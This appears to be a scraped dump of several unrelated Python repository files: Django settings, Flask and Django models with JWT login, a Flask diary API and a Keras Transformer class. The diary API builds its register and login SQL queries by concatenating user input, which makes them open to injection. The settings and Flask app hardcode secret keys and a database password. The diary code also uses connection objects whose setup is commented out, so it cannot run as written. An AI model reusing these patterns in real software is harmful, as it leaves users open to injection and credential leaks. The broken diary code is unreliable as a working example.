return self.binary_search(n, m + 1, e)
else:
return m
def book(self, start: int, end: int) -> bool:
idx = self.binary_search(start, 0, len(self.slist))
if self.slist:
if idx >= len(self.slist):
if self.map[self.slist[idx - 1]] > start:
return False
else:
if self.slist[idx] == start or end > self.slist[idx] or idx - 1 >= 0 and self.map[
self.slist[idx - 1]] > start:
return False
self.slist.insert(idx, start)
self.map[start] = end
return True
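# Note (added): binary_search(n, 0, len(self.slist)) returns the same insertion
# point as bisect.bisect_left(self.slist, n) from the standard library, since
# the stored starts are unique.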
if __name__ == '__main__':
ins = MyCalendar()
print(ins.book(4, 10))
print(ins.book(0, 2))
print(ins.book(3, 4))
# print(ins.book(9, 13))
# print(ins.book(13, 14))
# print(ins.book(0, 14))
print(ins.slist, ins.map)
| [
"[email protected]"
] | |
7ecc0aa792f338d0d49f24a3f18c7b94177b9e5a | 76fefdb20c453e830b8db86f32a1b42d79108cdd | /chat/settings.py | b541d5cf7bea3e72bc2a2d4b3ef21353ce88bcf6 | [] | no_license | Belie06Loryn/chaty-final-master | 35f6762e9bf45e1086db6280cd0bd7dc0828fb96 | 86e839c069eb54dad3390e84c6b7534d165a3942 | refs/heads/master | 2022-12-09T14:31:19.478090 | 2019-12-08T16:00:45 | 2019-12-08T16:00:45 | 226,365,156 | 0 | 0 | null | 2022-12-08T06:59:44 | 2019-12-06T16:08:51 | Python | UTF-8 | Python | false | false | 4,112 | py | """
Django settings for chat project.
Generated by 'django-admin startproject' using Django 2.2.6.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
from decouple import config
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '&$20_3$3wnb=p(kmmu!d*22+bt*6p3fawj5c(2724c(ny+w@yc'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'dashboardapp',
'bootstrap4',
'crispy_forms',
'jet.dashboard',
'jet',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.sites',
'channels',
'convos',
'bootstrap3',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'chat.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'chat.wsgi.application'
# ASGI CONFIG
ASGI_APPLICATION = "chat_ws.routing.application"
CHANNEL_LAYERS = {
"default": {
"BACKEND": "channels_redis.core.RedisChannelLayer",
"CONFIG": {
"hosts": ['redis://localhost:6379'],
},
},
}
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': 'dashboard',
'USER': 'alexie',
'PASSWORD':'root',
}
}
SITE_ID = 1
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
LOGOUT_REDIRECT_URL = '/'
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = (
os.path.join(BASE_DIR, 'static'),
)
MEDIA_URL='/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
JET_DEFAULT_THEME = 'green'
JET_SIDE_MENU_COMPACT = True
# Email configuration: remember to install python-decouple
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_USE_TLS = config('EMAIL_USE_TLS', cast=bool)
EMAIL_HOST = config('EMAIL_HOST')
EMAIL_PORT = config('EMAIL_PORT', cast=int)
EMAIL_HOST_USER = config('EMAIL_HOST_USER')
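# Sample .env entries read by python-decouple (added; all values are placeholders,
# covering this line and the EMAIL_HOST_PASSWORD line below):
#   EMAIL_USE_TLS=True
#   EMAIL_HOST=smtp.example.com
#   EMAIL_PORT=587
#   EMAIL_HOST_USER=user@example.com
#   EMAIL_HOST_PASSWORD=app-password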
EMAIL_HOST_PASSWORD = config('EMAIL_HOST_PASSWORD') | [
"[email protected]"
] | |
8a2a3a42acd557a574c3d3d292a46fbdbd4e4e45 | 1d0f579b0c43df9352dd2d9eea2897fa5d5d186f | /task/project/server/models.py | 6b2c4b312af9367dbe065001bcad36594c8bf575 | [] | no_license | mohiuddin89/all-service | 3c82d39c5860d3455a758d22f131079b51206752 | 0dcf7d6c8be8202bf86935245e8868285c2e105e | refs/heads/master | 2023-07-16T05:28:34.146458 | 2021-08-22T23:57:45 | 2021-08-22T23:57:45 | 398,889,765 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 15,336 | py | from datetime import datetime
from datetime import timedelta
from project.server import app, db, bcrypt
import jwt
class User(db.Model):
__tablename__ = "users"
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
registered_on = db.Column(db.DateTime, nullable=True)
first_name = db.Column(db.String(255), unique=False, nullable=True)
last_name = db.Column(db.String(255), unique=False, nullable=True)
phone_number = db.Column(db.String(20), unique=False, nullable=False)
nid = db.Column(db.String(255), nullable=True)
profile_photo = db.Column(db.String(255), nullable=True)
email = db.Column(db.String(255), nullable=True)
designation = db.Column(db.String(255), nullable=True)
department = db.Column(db.String(255), nullable=True)
member_type = db.Column(db.Integer, nullable=False)
company_id = db.Column(db.Integer, nullable=False)
createdAt = db.Column(db.DateTime, nullable=False)
updatedAt = db.Column(db.DateTime, nullable=False)
def __init__(self, company_id, phone_number, first_name='', last_name='', nid='', profile_photo='', member_type=''):
self.company_id = company_id
self.first_name = first_name
self.last_name = last_name
self.phone_number = phone_number
self.nid = nid
self.profile_photo = profile_photo
self.registered_on = datetime.utcnow()
self.createdAt = datetime.utcnow()
self.updatedAt = datetime.utcnow()
self.member_type = member_type
def encode_auth_token(self, user_id, modules):
user_details = User.query.filter_by(id=user_id).first()
try:
payload = {
'exp': datetime.utcnow() + timedelta(days=7),
'iat': datetime.utcnow(),
'sub': user_id,
'modules': modules,
'user_type': 'General',
'name': user_details.first_name + ' ' + user_details.last_name,
'phone_number': user_details.phone_number,
'member_type': user_details.member_type
}
token = jwt.encode(
payload,
app.config.get('SECRET_KEY'),
algorithm='HS256'
)
return token
except Exception as e:
return e
@staticmethod
def decode_auth_token(auth_token):
try:
            payload = jwt.decode(auth_token, app.config.get('SECRET_KEY'), algorithms=['HS256'])
is_blacklisted_token = BlacklistToken.check_blacklist(auth_token)
if is_blacklisted_token:
return 'Token blacklisted. Please log in again.'
else:
return payload['sub']
except jwt.ExpiredSignatureError:
return 'Signature expired. Please log in again.'
except jwt.InvalidTokenError:
return 'Invalid token. Please log in again.'
class DashboardUser(db.Model):
__tablename__ = "dashboard_users"
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
email = db.Column(db.String(255), unique=True, nullable=False)
password = db.Column(db.String(255), nullable=False)
registered_on = db.Column(db.DateTime, nullable=False)
username = db.Column(db.String(255), unique=True, nullable=False)
first_name = db.Column(db.String(255), unique=False, nullable=False)
last_name = db.Column(db.String(255), unique=False, nullable=False)
phone_number = db.Column(db.String(20), unique=False, nullable=True)
designation = db.Column(db.String(255), nullable=True)
department = db.Column(db.String(255), nullable=True)
nid = db.Column(db.String(255), nullable=True)
profile_photo = db.Column(db.String(255), nullable=True)
company_id = db.Column(db.String(255), nullable=False)
member_type = db.Column(db.Integer, nullable=False)
def __init__(self, email, password, username, first_name, last_name, company_id, phone_number='', nid='', profile_photo='', member_type=''):
self.email = email
self.password = bcrypt.generate_password_hash(
password, app.config.get('BCRYPT_LOG_ROUNDS')
).decode()
self.registered_on = datetime.now()
self.username = username
self.first_name = first_name
self.last_name = last_name
self.company_id = company_id
self.phone_number = phone_number
self.nid = nid
self.profile_photo = profile_photo
self.member_type = member_type
def encode_auth_token(self, user_id):
user_details = DashboardUser.query.filter_by(id=user_id).first()
try:
payload = {
'exp': datetime.utcnow() + timedelta(days=0, seconds=3600),
'iat': datetime.utcnow(),
'sub': user_id,
'user_type': 'Dashboard',
'name': user_details.first_name + ' ' + user_details.last_name,
'email': user_details.email,
'member_type': user_details.member_type
}
token = jwt.encode(
payload,
app.config.get('SECRET_KEY'),
algorithm='HS256'
)
return token
except Exception as e:
return e
@staticmethod
def decode_auth_token(auth_token):
try:
            payload = jwt.decode(auth_token, app.config.get('SECRET_KEY'), algorithms=['HS256'])
is_blacklisted_token = BlacklistToken.check_blacklist(auth_token)
if is_blacklisted_token:
return 'Token blacklisted. Please log in again.'
else:
return payload['sub']
except jwt.ExpiredSignatureError:
return 'Signature expired. Please log in again.'
except jwt.InvalidTokenError:
return 'Invalid token. Please log in again.'
class Companies(db.Model):
__tablename__ = "companies"
id = db.Column(db.Integer(), primary_key=True, autoincrement=True)
name = db.Column(db.String(255), unique=True, nullable=False)
address = db.Column(db.String(255), nullable=False)
agreement_file = db.Column(db.String(255), nullable=True)
verification_file = db.Column(db.String(255), nullable=True)
tin = db.Column(db.String(255), unique=False, nullable=False)
def __init__(self, name, address, tin, agreement_file='', verification_file=''):
self.name = name
self.address = address
self.agreement_file = agreement_file
self.verification_file = verification_file
self.tin = tin
class CompanyPanel(db.Model):
__tablename__ = "company_dashboard_users"
id = db.Column(db.Integer(), primary_key=True, autoincrement=True)
dashboard_user_id = db.Column(db.Integer(), nullable=False)
company_id = db.Column(db.Integer(), nullable=False)
def __init__(self, dashboard_user_id, company_id):
self.dashboard_user_id = dashboard_user_id
self.company_id = company_id
class CompanyUsers(db.Model):
__tablename__ = "company_general_users"
id = db.Column(db.Integer(), primary_key=True, autoincrement=True)
company_id = db.Column(db.Integer(), nullable=False)
user_id = db.Column(db.Integer(), nullable=False)
def __init__(self, company_id, user_id):
self.company_id = company_id
self.user_id = user_id
class Module(db.Model):
__tablename__ = 'modules'
id = db.Column(db.Integer(), primary_key=True, autoincrement=True)
name = db.Column(db.String(50), unique=False)
def __init__(self, name):
self.name = name
class UserModule(db.Model):
__tablename__ = 'user_modules'
id = db.Column(db.Integer(), primary_key=True)
user_id = db.Column(db.Integer(), db.ForeignKey('users.id', ondelete='CASCADE'))
module_id = db.Column(db.Integer(), db.ForeignKey('modules.id', ondelete='CASCADE'))
class BlacklistToken(db.Model):
__tablename__ = 'blacklist_tokens'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
token = db.Column(db.String(500), unique=True, nullable=False)
blacklisted_on = db.Column(db.DateTime, nullable=False)
def __init__(self, token):
self.token = token
self.blacklisted_on = datetime.now()
def __repr__(self):
        return '<id: token: {}>'.format(self.token)
@staticmethod
def check_blacklist(auth_token):
res = BlacklistToken.query.filter_by(token=str(auth_token)).first()
if res:
return True
else:
return False
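# --- Added usage sketch (not part of the original models) ---
# Typical logout flow wiring the helpers above together; the request/header
# handling is an assumption, not code from this project:
#
#   auth_token = request.headers.get('Authorization', '').split(" ")[-1]
#   resp = User.decode_auth_token(auth_token)
#   if not isinstance(resp, str):                # decode returns the user id on success
#       db.session.add(BlacklistToken(token=auth_token))
#       db.session.commit()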
class Albums(db.Model):
__tablename__ = "albums"
id = db.Column(db.Integer(), primary_key=True, autoincrement=True)
field_attendence_id = db.Column(db.Integer(), nullable=False)
createdAt = db.Column(db.DateTime, nullable=False)
updatedAt = db.Column(db.DateTime, nullable=False)
def __init__(self, field_attendence_id=''):
self.field_attendence_id = field_attendence_id
self.createdAt = datetime.utcnow()
self.updatedAt = datetime.utcnow()
class TaskAlbums(db.Model):
__tablename__ = "task_albums"
id = db.Column(db.Integer(), primary_key=True, autoincrement=True)
task_id = db.Column(db.Integer(), nullable=False)
createdAt = db.Column(db.DateTime, nullable=False)
updatedAt = db.Column(db.DateTime, nullable=False)
def __init__(self, task_id=''):
self.task_id = task_id
self.createdAt = datetime.utcnow()
self.updatedAt = datetime.utcnow()
class FieldAttendance(db.Model):
__tablename__ = "field_attendence"
id = db.Column(db.Integer(), primary_key=True, autoincrement=True)
title = db.Column(db.String(255), nullable=False)
assigned_time = db.Column(db.String(255), nullable=False)
assigned_location_lattitude = db.Column(db.String(255), nullable=False)
assigned_location_longitude = db.Column(db.String(255), nullable=False)
address = db.Column(db.String(255), nullable=False)
admin_id = db.Column(db.Integer(), nullable=False)
attendence_time = db.Column(db.String(255), nullable=True)
attendence_location_lattitude = db.Column(db.String(255), nullable=True)
attendence_location_longitude = db.Column(db.String(255), nullable=True)
attendence_status = db.Column(db.Boolean(), nullable=True)
comment = db.Column(db.String(255), nullable=True)
user_id = db.Column(db.Integer(), nullable=True)
album_id = db.Column(db.Integer(), nullable=True)
createdAt = db.Column(db.DateTime, nullable=False)
updatedAt = db.Column(db.DateTime, nullable=False)
def __init__(self, title, assigned_time, assigned_location_lattitude, assigned_location_longitude, address, admin_id):
self.title = title
self.assigned_time = assigned_time
self.assigned_location_lattitude = assigned_location_lattitude
self.assigned_location_longitude = assigned_location_longitude
self.address = address
self.admin_id = admin_id
self.createdAt = datetime.utcnow()
self.updatedAt = datetime.utcnow()
class Photos(db.Model):
__tablename__ = "photos"
id = db.Column(db.Integer(), primary_key=True, autoincrement=True)
album_id = db.Column(db.Integer(), nullable=False)
photo_url = db.Column(db.String(255), nullable=False)
createdAt = db.Column(db.DateTime, nullable=False)
updatedAt = db.Column(db.DateTime, nullable=False)
def __init__(self, album_id='', photo_url=''):
self.album_id = album_id
self.photo_url = photo_url
self.createdAt = datetime.utcnow()
self.updatedAt = datetime.utcnow()
class TaskPhotos(db.Model):
__tablename__ = "task_photos"
id = db.Column(db.Integer(), primary_key=True, autoincrement=True)
album_id = db.Column(db.Integer(), nullable=False)
photo_url = db.Column(db.String(255), nullable=False)
createdAt = db.Column(db.DateTime, nullable=False)
updatedAt = db.Column(db.DateTime, nullable=False)
def __init__(self, album_id='', photo_url=''):
self.album_id = album_id
self.photo_url = photo_url
self.createdAt = datetime.utcnow()
self.updatedAt = datetime.utcnow()
class Services(db.Model):
__tablename__ = "services"
id = db.Column(db.Integer(), primary_key=True, autoincrement=True)
name = db.Column(db.String(255), nullable=False)
service_type = db.Column(db.String(255), nullable=True)
createdAt = db.Column(db.DateTime, nullable=False)
updatedAt = db.Column(db.DateTime, nullable=False)
def __init__(self, name='', service_type=''):
self.name = name
self.service_type = service_type
self.createdAt = datetime.utcnow()
self.updatedAt = datetime.utcnow()
class CompanyServices(db.Model):
__tablename__ = "company_services"
id = db.Column(db.Integer(), primary_key=True, autoincrement=True)
company_id = db.Column(db.Integer(), nullable=False)
service_id = db.Column(db.Integer(), nullable=False)
createdAt = db.Column(db.DateTime, nullable=False)
updatedAt = db.Column(db.DateTime, nullable=False)
def __init__(self, company_id='', service_id=''):
self.company_id = company_id
self.service_id = service_id
self.createdAt = datetime.utcnow()
self.updatedAt = datetime.utcnow()
class TaskService(db.Model):
__tablename__ = "task_service"
id = db.Column(db.Integer(), primary_key=True, autoincrement=True)
title = db.Column(db.String(255), nullable=False)
is_paid = db.Column(db.Boolean(), nullable=False)
payment_status = db.Column(db.Boolean(), nullable=False)
assigned_time = db.Column(db.String(255), nullable=False)
assigned_location_lattitude = db.Column(db.String(255), nullable=False)
assigned_location_longitude = db.Column(db.String(255), nullable=False)
assigned_address = db.Column(db.String(255), nullable=False)
admin_id = db.Column(db.Integer(), nullable=False)
user_id = db.Column(db.Integer(), nullable=False)
task_complete_time = db.Column(db.String(255), nullable=True)
task_complete_location_lattitude = db.Column(db.String(255), nullable=True)
task_complete_location_longitude = db.Column(db.String(255), nullable=True)
task_complete_status = db.Column(db.Boolean(), nullable=True)
bill_amount = db.Column(db.Float(), nullable=True)
billing_address = db.Column(db.String(255), nullable=True)
notes = db.Column(db.String(255), nullable=True)
album_id = db.Column(db.Integer(), nullable=True)
createdAt = db.Column(db.DateTime, nullable=False)
updatedAt = db.Column(db.DateTime, nullable=False)
def __init__(self, title, is_paid, bill_amount, assigned_time, assigned_location_lattitude, assigned_location_longitude, assigned_address, admin_id, user_id, payment_status=False):
self.title = title
self.is_paid = is_paid
self.bill_amount = bill_amount
self.assigned_time = assigned_time
self.assigned_location_lattitude = assigned_location_lattitude
self.assigned_location_longitude = assigned_location_longitude
self.assigned_address = assigned_address
self.admin_id = admin_id
self.user_id = user_id
self.payment_status = payment_status
self.createdAt = datetime.utcnow()
self.updatedAt = datetime.utcnow()

# ---- file: /name/home/models.py (repo: Mrunmayi28/python_miniproject) ----
from django.db import models
import datetime
# Create your models here.
class certi(models.Model):
internship = models.FileField(null = True)
course = models.FileField(null = True)
class Meta:
db_table = "Certis"
class formed(models.Model):
Name = models.CharField(max_length=30)
Contact=models.CharField(max_length=40)
email=models.EmailField()
class Meta:
db_table = "Formeds"
class academy(models.Model):
cgpa = models.TextField(max_length=70)
percentage = models.TextField(max_length=70)
subject1 = models.TextField(max_length=70)
subject2 = models.TextField(max_length=70)
subject3 = models.TextField(max_length=70)
subject4 = models.TextField(max_length=70)
subject5 = models.TextField(max_length=70)
kt = models.TextField(max_length=70)
class stu_info(models.Model):
idNumber = models.IntegerField()
roll = models.IntegerField()
department = models.CharField(max_length=10)
student_name = models.CharField(max_length=10)
father_name = models.CharField(max_length=10)
mother_name = models.CharField(max_length=10)
last_name = models.CharField(max_length=10)
photo = models.FileField(null = True)
sign = models.FileField(null = True)
dob = models.DateField()
student_email = models.EmailField()
phone = models.IntegerField()
completion_year = models.IntegerField()
current_year =models.TextField(max_length=50)
address = models.CharField(max_length=20)
country = models.CharField(max_length=10)
state = models.CharField(max_length=15)
district = models.CharField(max_length=10)
email_mother = models.EmailField()
email_father = models.EmailField()
number_father = models.IntegerField()
number_mother = models.IntegerField()
designation_mother = models.CharField(max_length=20)
designation_father = models.CharField(max_length=20)
class Meta:
db_table = "Stu_infos"
class student_add(models.Model):
name = models.CharField(max_length=100)
    number = models.CharField(max_length=70)

# ---- file: /wikpy/tests/functional/test_edit.py (repo: seken/wikpy) ----
from wikpy.tests import *
class TestEditController(TestController):
def test_index(self):
response = self.app.get(url(controller='edit', action='index'))
# Test response...

# ---- file: /examplescripts/timed.py (repo: krljg/lsystem) ----
# Make an l-system with a "time" parameter and a "detail" parameter
# For each "time" step the lsystem has to do a predetermined number of "detail" iterations
import lsystem.exec
import mathutils
ex = lsystem.exec.Exec()
# todo
ex.exec(min_iterations=11)

# ---- file: /app/app.py (repo: Krafty-Coder/MyDiary) ----
"""Import flask modules"""
from flask import Flask, jsonify, request
from flask_jwt_extended import (
JWTManager, jwt_required, create_access_token
)
from app.models import *
app = Flask(__name__)
app.config['JWT_SECRET_KEY'] = '5c750c0e72ce5394dfe7720fa26d0327d616ff9ff869be19'
jwt = JWTManager(app)
@app.route('/', methods=['GET'])
def index():
return jsonify("Welcome to mydiary")
@app.route('/api/v1/auth/register', methods=['POST'])
def register():
"""This is a function for registering a user"""
#conn = psycopg2.connect("dbname=diary user=postgres password=123456 host=localhost")
#cur = conn.cursor()
username = request.get_json()['username']
email = request.get_json()['email']
password = request.get_json()['password']
password_confirmation = request.get_json()['password_confirmation']
try:
cur.execute("INSERT INTO users (username, email, password, password_confirmation)\
VALUES('"+username+"', '"+email+"', '"+password+"', '"+password_confirmation+"');")
except:
return jsonify({'message': 'Try again'})
finally:
conn.commit()
return jsonify({'message': 'You are successfully registered!'})
@app.route('/api/v1/auth/login', methods=['POST'])
def login():
"""This is a function for user login"""
#conn = psycopg2.connect("dbname=diary user=postgres password=123456 host=localhost")
#cur = conn.cursor()
username = request.get_json()['username']
password = request.get_json()['password']
#user_info = []
cur.execute("SELECT * FROM users WHERE username LIKE '"+username+"'\
AND password LIKE '"+password+"'")
rows = cur.fetchone()
if rows is None:
return jsonify({'message': 'Not successful you can try again'})
else:
access_token = create_access_token(identity=username)
return jsonify(access_token=access_token)
conn.commit()
@app.route('/api/v1/entries', methods=['POST'])
@jwt_required
def create_entry():
"""This is a fuction for creating an entry"""
#conn = psycopg2.connect("dbname=diary user=postgres password=123456 host=localhost")
#cur = conn.cursor()
title = request.get_json()['title']
content = request.get_json()['content']
    try:
        # Parameterized insert; on success control falls through to the
        # 201 response below.
        cur.execute("INSERT INTO entries (title, content) VALUES(%s, %s);",
                    (title, content))
    except Exception:
        return jsonify({'message': 'Not successful, try again!'})
    finally:
        conn.commit()
    return jsonify({'message': 'Entry successfully created!'}), 201
@app.route('/api/v1/entries', methods=['GET'])
@jwt_required
def get_all_entries():
"""This is a function for getting all entries"""
#conn = psycopg2.connect("dbname=diary user=postgres password=123456 host=localhost")
#cur = conn.cursor()
my_list = []
try:
cur.execute("SELECT * from entries")
rows = cur.fetchall()
for row in rows:
my_list.append(row[0])
my_list.append(row[1])
my_list.append(row[2])
    except Exception:
        return jsonify({'message': "Can't retrieve entries"})
finally:
conn.close()
return jsonify(my_list)
@app.route('/api/v1/entries/<int:entry_id>', methods=['PUT'])
@jwt_required
def modify_entry(entry_id):
"""This is a function for viewing single entry"""
#conn = psycopg2.connect("dbname=diary user=postgres password=123456 host=localhost")
#cur = conn.cursor()
cur.execute("SELECT * FROM entries WHERE ID = %s", (entry_id,))
entry = cur.fetchone()
title = request.get_json()['title']
content = request.get_json()['content']
if entry is not None:
cur.execute("UPDATE entries SET title=%s, content=%s WHERE id=%s",\
(title, content, entry_id))
conn.commit()
return jsonify({'message': 'Entry successfully updated'}), 201
else:
return jsonify({'message': 'Not complete no entry'})
@app.route('/api/v1/entries/<int:entry_id>', methods=['GET'])
def view_entry(entry_id):
"""This is a function for viewing single entry"""
#conn = psycopg2.connect("dbname=diary user=postgres password=123456 host=localhost")
#cur = conn.cursor()
cur.execute("SELECT * FROM entries WHERE ID = %s", (entry_id,))
rows = cur.fetchall()
output = {}
for row in rows:
output.update({row[0]: row[1]})
conn.close()
return jsonify(output)
@app.route('/api/v1/entries/<int:entry_id>', methods=['DELETE'])
@jwt_required
def delete_entry(entry_id):
"""This is a function for deleting an entry"""
#conn = psycopg2.connect("dbname=diary user=postgres password=123456 host=localhost")
#cur = conn.cursor()
try:
cur.execute("DELETE FROM entries WHERE ID = %s", (entry_id,))
conn.commit()
    except Exception:
        return jsonify({'message': "Can't delete entry"})
finally:
conn.close()
return jsonify({'message': 'successfully deleted'}), 204
if __name__ == '__main__':
app.run(debug=True)
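# Hedged usage sketch (not part of the original app); host, port and the demo
# credentials below are assumptions, not values from this file:
#
#   import requests
#   base = 'http://127.0.0.1:5000'
#   requests.post(base + '/api/v1/auth/register', json={
#       'username': 'demo', 'email': '[email protected]',
#       'password': 'secret', 'password_confirmation': 'secret'})
#   tok = requests.post(base + '/api/v1/auth/login',
#                       json={'username': 'demo', 'password': 'secret'}).json()['access_token']
#   requests.post(base + '/api/v1/entries',
#                 json={'title': 'day 1', 'content': 'dear diary'},
#                 headers={'Authorization': 'Bearer ' + tok})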

# ---- file: /blog/migrations/0001_initial.py (repo: cu187008059/herokudjango) ----
# Generated by Django 2.2.1 on 2019-05-21 16:32
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=20)),
],
),
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=255)),
('body', models.TextField()),
('created_on', models.DateTimeField(auto_now_add=True)),
('last_modified', models.DateTimeField(auto_now=True)),
('categories', models.ManyToManyField(related_name='posts', to='blog.Category')),
],
),
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('author', models.CharField(max_length=60)),
('body', models.TextField()),
('created_on', models.DateTimeField(auto_now_add=True)),
('post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blog.Post')),
],
),
]

# ---- file: /webke/models.py (repo: microw/webke) ----
#! -*- coding: utf-8 -*-
# Main models
import numpy as np
#from bert4keras.layers import *
from layers import *
from bert4keras.snippets import insert_arguments
from bert4keras.snippets import delete_arguments
from bert4keras.snippets import is_string, is_one_of
from keras.models import Model
import json
class Transformer(object):
"""模型基类
"""
def __init__(
self,
        vocab_size,  # vocabulary size
        hidden_size,  # hidden (encoding) dimension
        num_hidden_layers,  # total number of Transformer layers
        num_attention_heads,  # number of attention heads
        intermediate_size,  # hidden dimension of the FeedForward block
        hidden_act,  # activation of the FeedForward hidden layer
        dropout_rate=None,  # dropout rate
        embedding_size=None,  # optionally override the embedding size
        attention_head_size=None,  # head_size of V in attention
        attention_key_size=None,  # head_size of Q and K in attention
        sequence_length=None,  # optionally fix the sequence length
        keep_tokens=None,  # list of token IDs to keep
        compound_tokens=None,  # extended (compound-token) embeddings
        residual_attention_scores=False,  # add residuals to attention matrices
        ignore_invalid_weights=False,  # allow skipping missing weights
        layers=None,  # externally supplied Keras layers
        prefix=None,  # layer-name prefix
        name=None,  # model name
**kwargs
):
if keep_tokens is not None:
vocab_size = len(keep_tokens)
if compound_tokens is not None:
vocab_size += len(compound_tokens)
self.vocab_size = vocab_size
self.hidden_size = hidden_size
self.num_hidden_layers = num_hidden_layers
self.num_attention_heads = num_attention_heads
self.attention_head_size = attention_head_size or hidden_size // num_attention_heads
self.attention_key_size = attention_key_size or self.attention_head_size
self.intermediate_size = intermediate_size
self.dropout_rate = dropout_rate or 0
self.hidden_act = hidden_act
self.embedding_size = embedding_size or hidden_size
self.sequence_length = sequence_length
self.keep_tokens = keep_tokens
self.compound_tokens = compound_tokens
self.attention_bias = None
self.position_bias = None
self.attention_scores = None
self.residual_attention_scores = residual_attention_scores
self.ignore_invalid_weights = ignore_invalid_weights
self.layers = {} if layers is None else layers
self.prefix = prefix or ''
self.name = name
self.built = False
def build(
self,
attention_caches=None,
layer_norm_cond=None,
layer_norm_cond_hidden_size=None,
layer_norm_cond_hidden_act=None,
additional_input_layers=None,
**kwargs
):
"""模型构建函数
attention_caches:为Attention的K,V的缓存序列字典,格式为
{Attention层名: [K缓存, V缓存]};
layer_norm_*系列参数:实现Conditional Layer Normalization时使用,
用来实现以“固定长度向量”为条件的条件Bert。
"""
if self.built:
return None
# Input
inputs = self.get_inputs()
self.set_inputs(inputs, additional_input_layers)
# Other
self.attention_caches = attention_caches or {}
self.layer_norm_conds = [
layer_norm_cond,
layer_norm_cond_hidden_size,
layer_norm_cond_hidden_act or 'linear',
]
# Call
outputs = self.call(inputs)
self.set_outputs(outputs)
# Model
self.model = Model(self.inputs, self.outputs, name=self.name)
self.built = True
def call(self, inputs):
"""定义模型的执行流程
"""
# Embedding
outputs = self.apply_embeddings(inputs)
# Main
for i in range(self.num_hidden_layers):
outputs = self.apply_main_layers(outputs, i)
# Final
outputs = self.apply_final_layers(outputs)
return outputs
def prefixed(self, name):
"""给名字加前缀
"""
if name is not None:
return self.prefix + name
def apply(self, inputs=None, layer=None, arguments=None, **kwargs):
"""通过apply调用层会自动重用同名层
inputs: 上一层的输出;
layer: 要调用的层类名;
arguments: 传递给layer.call的参数;
kwargs: 传递给层初始化的参数。
"""
if layer is Dropout and self.dropout_rate == 0:
return inputs
if layer is MultiHeadAttention and self.residual_attention_scores:
kwargs['return_attention_scores'] = True
arguments = arguments or {}
name = self.prefixed(kwargs.get('name'))
kwargs['name'] = name
if name not in self.layers:
layer = layer(**kwargs)
name = layer.name
self.layers[name] = layer
if inputs is None:
return self.layers[name]
else:
if isinstance(self.layers[name], MultiHeadAttention):
if name in self.attention_caches:
                    # If a cache is passed in, automatically concatenate it onto Key and Value
k_cache, v_cache = self.attention_caches[name]
k_name, v_name = name + '-Cached-Key', name + '-Cached-Value'
k = Concatenate1D(name=k_name)([k_cache, inputs[1]])
v = Concatenate1D(name=v_name)([v_cache, inputs[2]])
inputs = inputs[:1] + [k, v] + inputs[3:]
if self.residual_attention_scores:
                    # With residual attention matrices, the previous layer's attention
                    # matrix is added to each attention matrix, following the RealFormer
                    # design (https://arxiv.org/abs/2012.11747). The current
                    # implementation is still rough and may lack generality.
if self.attention_scores is not None:
if arguments.get('a_bias'):
a_bias = Add(name=name + '-Attention-Bias'
)([inputs[3], self.attention_scores])
inputs = inputs[:3] + [a_bias] + inputs[4:]
else:
a_bias = self.attention_scores
inputs = inputs[:3] + [a_bias] + inputs[3:]
arguments['a_bias'] = True
o, a = self.layers[name](inputs, **arguments)
self.attention_scores = a
return o
return self.layers[name](inputs, **arguments)
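    # Note on the reuse contract (added commentary): calling
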